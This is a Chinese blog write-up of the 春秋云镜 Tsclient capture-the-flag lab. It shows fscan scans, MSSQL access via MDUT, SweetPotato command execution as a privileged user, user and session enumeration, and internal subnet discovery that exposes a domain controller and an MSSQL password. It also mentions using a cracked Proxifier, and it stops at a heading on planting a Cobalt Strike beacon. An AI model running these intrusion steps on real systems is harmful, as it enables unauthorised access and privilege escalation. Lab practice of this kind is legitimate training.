春秋云镜Tsclient

(Updated: )
春秋云镜

看了一下WP意识到可能以后都需要使用Proxifier 来进行搭建全局代理了,所以我先弄一个这个Proxifier 破解

1

配置好服务器之后我们还需要配置代理规则(其实不写就好了,就是全局代理,拿一下),诶那怎么关呢,看着像是只能靠关闭程序来关了,绷不住了,后面问了一下,chu0师傅告诉我在规则里面选择Direct就好了,事实也确实如此

1

mssql

fscan先扫一下

1
.\fscan.exe -h 39.99.130.164 -p 1-65535

但是我Windows扫不动,我不知道为什么,然后我就用的服务器的来扫

发现mssql服务,用MDUT链接一下下,由于这个工具必须用jdk8,所以写了一个bat文件

1
2
3
4
5
6
7
8
9
10
11
12
13
@echo off
rem 设置 Java 8 的路径
SET JAVA8_JRE=C:\Program Files\Java\jdk1.8.0_201\jre\bin
SET JAVA8_JDK=C:\Program Files\Java\jdk1.8.0_201\bin

rem 临时修改 PATH,使 Java 8 的 JDK 和 JRE 生效
SET PATH=%JAVA8_JDK%;%JAVA8_JRE%;%PATH%

rem 运行 JAR 文件
java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

rem 暂停以查看输出
pause

1

现在进入之后,其实这个东西就类似于数据库的antsword,所以我们肯定是要传马进去的,这里使用一个SweetPotato来执行命令,因为他权限足够高,避免了提权的麻烦,一步到位

1
C:/Users/Public/sweetpotato.exe -a whoami

把组件全部激活一下,然后挨着试总能执行命令的

1
2
C:/Users/Public/sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"
 flag{66b3a46b-f5bd-40b9-8ed8-9d9d6373f651}

查看一下用户

1
2
3
4
5
6
7
C:/Users/Public/sweetpotato.exe -a "net user"

Administrator            
DefaultAccount           
Guest                    

John

查看一下在线用户

1
2
3
C:/Users/Public/sweetpotato.exe -a "quser || qwinst"
 �û���                �Ự��             ID  ״̬    ����ʱ��   ��¼ʱ��
 john                  rdp-tcp#0           2  ������         22  2025/3/14 10:02

看看网段

1
2
C:/Users/Public/sweetpotato.exe -a "ipconfig"
172.22.8.18

把fscan传上,扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
C:/Users/Public/sweetpotato.exe -a "C:/Users/Public/fscan.exe -h 172.22.8.18/24"
start infoscan

(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.46     is alive

[*] Icmp alive hosts len is: 4

[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:38c0:5b8:d89c:7d5b
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
已完�?16/16

[*] 扫描结束,耗时: 10.055897s

端口我觉得没啥用我就给删了,所以现在就是有四台机器,

1
2
3
4
172.22.8.18 当前机器
172.22.8.31 域内机器
172.22.8.46 域内机器
172.22.8.15 DC域控

本来我是有权限的,想直接dumphash,结果失败了,那只能用CS来上线一个马,但是不会,所以在这里也记录一下过程

CS上马